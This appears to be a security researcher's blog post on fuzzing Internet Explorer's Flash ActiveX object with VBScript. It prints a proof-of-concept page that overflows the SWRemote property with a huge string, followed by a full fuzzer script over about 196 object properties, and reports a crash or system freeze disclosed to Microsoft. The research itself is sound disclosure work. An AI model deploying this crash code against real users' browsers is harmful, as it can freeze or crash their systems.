VBScript Fuzzing.

Publicated on : 1207855210
I wrote a small VBscript fuzzer for Internet Explorer, mainly to fuzz objects. The reason is that regular Javascript is somehow protected from overflowing the heap in loops. Internet Explorer sees a huge loop and tries to kill it, or asks you to kill it. I noticed that with VBscript this isn't the case, it let us run code until it runs out of memory or overflows the heap, and just gives a warning or crashes after it overflowed. Which is neat, because it's more reliable.



Fuzzing the Flash object.



I found out that it's possible to overflow the SWRemote object inside Flash with a very long string generated in VBscript. In my test case it runs for about 30 seconds before crashing and raising the exception, probably a heap corruption. When trying to kill it, it can result in a full system freeze. In two cases I had to reboot the system because it ran out of all memory.



The vulnerable object:

<param name="swRemote" value = "">

Which can be set in IE with SWRemote=long_string

 

<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='foo'>
 

<param name="src" value="foo.swf">
 

</object>
 


 

<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='bar'>
 

<param name="src" value="foo.swf">
 

</object>
 


 

<script type='text/vbscript'>
 


 

long=String(100000000,"X")
 

foo.SWRemote=long
 

bar.SWRemote=long
 


 

</script>

In figure 1 I show a live trace while Internet explorer was executing the code. It shows that it raises an exception because of too much memory allocation.



Figure 1.







The VBScript Fuzzer.



A live demo can be found here: http://0x000000.com/lab/swf/swf.php

<html>
 

<body>
 


 

<h1>Flash Object VBFuzzer</h1>
 

<hr />
 


 

<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='foo'>
 

<param name="src" value="foo.swf">
 

<param name="playing" value="0">
 

</object>
 


 

<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='bar'>
 

<param name="src" value="foo.swf">
 

<param name="playing" value="0">
 


 

</object>
 


 

<hr />
 


 

<script type="text/vbscript">
 


 

' ------------------------------
 

' by Ronald van den Heetkamp
 

' SWRemote crashes MSIE7 
 

' full system freeze on kill?
 

' ------------------------------
 

'
 


 

Dim DataArray(195)
 

DataArray(0) = "nextSibling"
 

DataArray(1) = "onresizeend"
 

DataArray(2) = "onrowenter"
 

DataArray(3) = "ariaPosinset"
 

DataArray(4) = "childNodes"
 

DataArray(5) = "ondragleave"
 

DataArray(6) = "canHaveHTML"
 

DataArray(7) = "onbeforepaste"
 

DataArray(8) = "ondragover"
 

DataArray(9) = "ariaSelected"
 

DataArray(10) = "onbeforecopy"
 

DataArray(11) = "ariaHidden"
 

DataArray(12) = "onpage"
 

DataArray(13) = "recordNumber"
 

DataArray(14) = "previousSibling"
 

DataArray(15) = "nodeName"
 

DataArray(16) = "onbeforeactivate"
 

DataArray(17) = "accessKey"
 

DataArray(18) = "currentStyle"
 

DataArray(19) = "ariaChecked"
 

DataArray(20) = "scrollLeft"
 

DataArray(21) = "onbeforeeditfocus"
 

DataArray(22) = "oncontrolselect"
 

DataArray(23) = "onblur"
 

DataArray(24) = "hideFocus"
 

DataArray(25) = "clientHeight"
 

DataArray(26) = "style"
 

DataArray(27) = "onbeforedeactivate"
 

DataArray(28) = "dir"
 

DataArray(29) = "onkeydown"
 

DataArray(30) = "nodeType"
 

DataArray(31) = "ondragstart"
 

DataArray(32) = "onscroll"
 

DataArray(33) = "onpropertychange"
 

DataArray(34) = "ondragenter"
 

DataArray(35) = "id"
 

DataArray(36) = "onrowsinserted"
 

DataArray(37) = "scopeName"
 

DataArray(38) = "lang"
 

DataArray(39) = "ariaSetsize"
 

DataArray(40) = "onmouseup"
 

DataArray(41) = "oncontextmenu"
 

DataArray(42) = "language"
 

DataArray(43) = "ariaLevel"
 

DataArray(44) = "ariaReadonly"
 

DataArray(45) = "scrollTop"
 

DataArray(46) = "offsetWidth"
 

DataArray(47) = "onbeforeupdate"
 

DataArray(48) = "onreadystatechange"
 

DataArray(49) = "onmouseenter"
 

DataArray(50) = "filters"
 

DataArray(51) = "onresize"
 

DataArray(52) = "isContentEditable"
 

DataArray(53) = "oncopy"
 

DataArray(54) = "onselectstart"
 

DataArray(55) = "scrollHeight"
 

DataArray(56) = "onmove"
 

DataArray(57) = "ondragend"
 

DataArray(58) = "onrowexit"
 

DataArray(59) = "lastChild"
 

DataArray(60) = "onactivate"
 

DataArray(61) = "canHaveChildren"
 

DataArray(62) = "onfocus"
 

DataArray(63) = "onfocusin"
 

DataArray(64) = "isMultiLine"
 

DataArray(65) = "onmouseover"
 

DataArray(66) = "ariaHaspopup"
 

DataArray(67) = "ariaMultiselect"
 

DataArray(68) = "oncut"
 

DataArray(69) = "parentNode"
 

DataArray(70) = "ariaSecret"
 

DataArray(71) = "tagName"
 

DataArray(72) = "className"
 

DataArray(73) = "onmousemove"
 

DataArray(74) = "title"
 

DataArray(75) = "role"
 

DataArray(76) = "behaviorUrns"
 

DataArray(77) = "ariaInvalid"
 

DataArray(78) = "onfocusout"
 

DataArray(79) = "onfilterchange"
 

DataArray(80) = "disabled"
 

DataArray(81) = "parentTextEdit"
 

DataArray(82) = "ariaValuenow"
 

DataArray(83) = "ownerDocument"
 

DataArray(84) = "offsetParent"
 

DataArray(85) = "ondrop"
 

DataArray(86) = "ondblclick"
 

DataArray(87) = "tabIndex"
 

DataArray(88) = "onkeypress"
 

DataArray(89) = "onlosecapture"
 

DataArray(90) = "innerText"
 

DataArray(91) = "children"
 

DataArray(92) = "parentElement"
 

DataArray(93) = "ondeactivate"
 

DataArray(94) = "isDisabled"
 

DataArray(95) = "ondatasetchanged"
 

DataArray(96) = "ondataavailable"
 

DataArray(97) = "onafterupdate"
 

DataArray(98) = "nodeValue"
 

DataArray(99) = "onmousewheel"
 

DataArray(100) = "onkeyup"
 

DataArray(101) = "readyState"
 

DataArray(102) = "offsetTop"
 

DataArray(103) = "onmovestart"
 

DataArray(104) = "onmouseout"
 

DataArray(105) = "onrowsdelete"
 

DataArray(106) = "onmoveend"
 

DataArray(107) = "ariaExpanded"
 

DataArray(108) = "contentEditable"
 

DataArray(109) = "document"
 

DataArray(110) = "firstChild"
 

DataArray(111) = "sourceIndex"
 

DataArray(112) = "outerText"
 

DataArray(113) = "isTextEdit"
 

DataArray(114) = "oncellchange"
 

DataArray(115) = "runtimeStyle"
 

DataArray(116) = "scrollWidth"
 

DataArray(117) = "onlayoutcomplete"
 

DataArray(118) = "onhelp"
 

DataArray(119) = "attributes"
 

DataArray(120) = "offsetHeight"
 

DataArray(121) = "onerrorupdate"
 

DataArray(122) = "ariaBusy"
 

DataArray(123) = "onmousedown"
 

DataArray(124) = "clientTop"
 

DataArray(125) = "clientWidth"
 

DataArray(126) = "ariaRequired"
 

DataArray(127) = "onpaste"
 

DataArray(128) = "tagUrn"
 

DataArray(129) = "onmouseleave"
 

DataArray(130) = "ariaDisabled"
 

DataArray(131) = "ariaPressed"
 

DataArray(132) = "onclick"
 

DataArray(133) = "outerHTML"
 

DataArray(134) = "ondrag"
 

DataArray(135) = "onresizestart"
 

DataArray(136) = "ondatasetcomplete"
 

DataArray(137) = "clientLeft"
 

DataArray(138) = "all"
 

DataArray(139) = "onbeforecut"
 

DataArray(140) = "innerHTML"
 

DataArray(141) = "offsetLeft"
 

DataArray(142) = "vspace"
 

DataArray(143) = "height"
 

DataArray(144) = "border"
 

DataArray(145) = "altHtml"
 

DataArray(146) = "alt"
 

DataArray(147) = "codeBase"
 

DataArray(148) = "type"
 

DataArray(149) = "codeType"
 

DataArray(150) = "useMap"
 

DataArray(151) = "standby"
 

DataArray(152) = "width"
 

DataArray(153) = "dataSrc"
 

DataArray(154) = "dataFld"
 

DataArray(155) = "dataFormatAs"
 

DataArray(156) = "declare"
 

DataArray(157) = "name"
 

DataArray(158) = "form"
 

DataArray(159) = "archive"
 

DataArray(160) = "onerror"
 

DataArray(161) = "contentDocument"
 

DataArray(162) = "code"
 

DataArray(163) = "align"
 

DataArray(164) = "BaseHref"
 

DataArray(165) = "hspace"
 

DataArray(166) = "ReadyState"
 

DataArray(167) = "TotalFrames"
 

DataArray(168) = "Playing"
 

DataArray(169) = "Quality"
 

DataArray(170) = "ScaleMode"
 

DataArray(171) = "AlignMode"
 

DataArray(172) = "BackgroundColor"
 

DataArray(173) = "Loop"
 

DataArray(174) = "Movie"
 

DataArray(175) = "FrameNum"
 

DataArray(176) = "WMode"
 

DataArray(177) = "SAlign"
 

DataArray(178) = "Menu"
 

DataArray(179) = "Base"
 

DataArray(180) = "Scale"
 

DataArray(181) = "DeviceFont"
 

DataArray(182) = "EmbedMovie"
 

DataArray(183) = "BGColor"
 

DataArray(184) = "Quality2"
 

DataArray(185) = "SWRemote"
 

DataArray(186) = "FlashVars"
 

DataArray(187) = "AllowScriptAccess"
 

DataArray(188) = "MovieData"
 

DataArray(189) = "InlineData"
 

DataArray(190) = "SeamlessTabbing"
 

DataArray(191) = "Profile"
 

DataArray(192) = "ProfileAddress"
 

DataArray(193) = "ProfilePort"
 

DataArray(194) = "AllowNetworking"
 

DataArray(195) = "AllowFullScreen"
 


 


 

'String overloader
 

'-----------------
 


 

function overload(n)
 

overload = String(100000000,"1")
 

n = overload
 

end function
 


 

'The fuzz loop
 

'-------------
 


 

For count = 147 to 195
 

document.write("<br /><input type=button onclick=overload('foo." & DataArray(count) & "') overload('bar." & DataArray(count) & "') value=Fuzz!> " & DataArray(count))
 

Next
 


 


 

</script>
 


 

</body>
 

</html>

Conclusion.



It seems that VBscript is a very reliable way of controlling the heap than regular Javascript c.q. JScript. Microsoft was notified timely about the issue.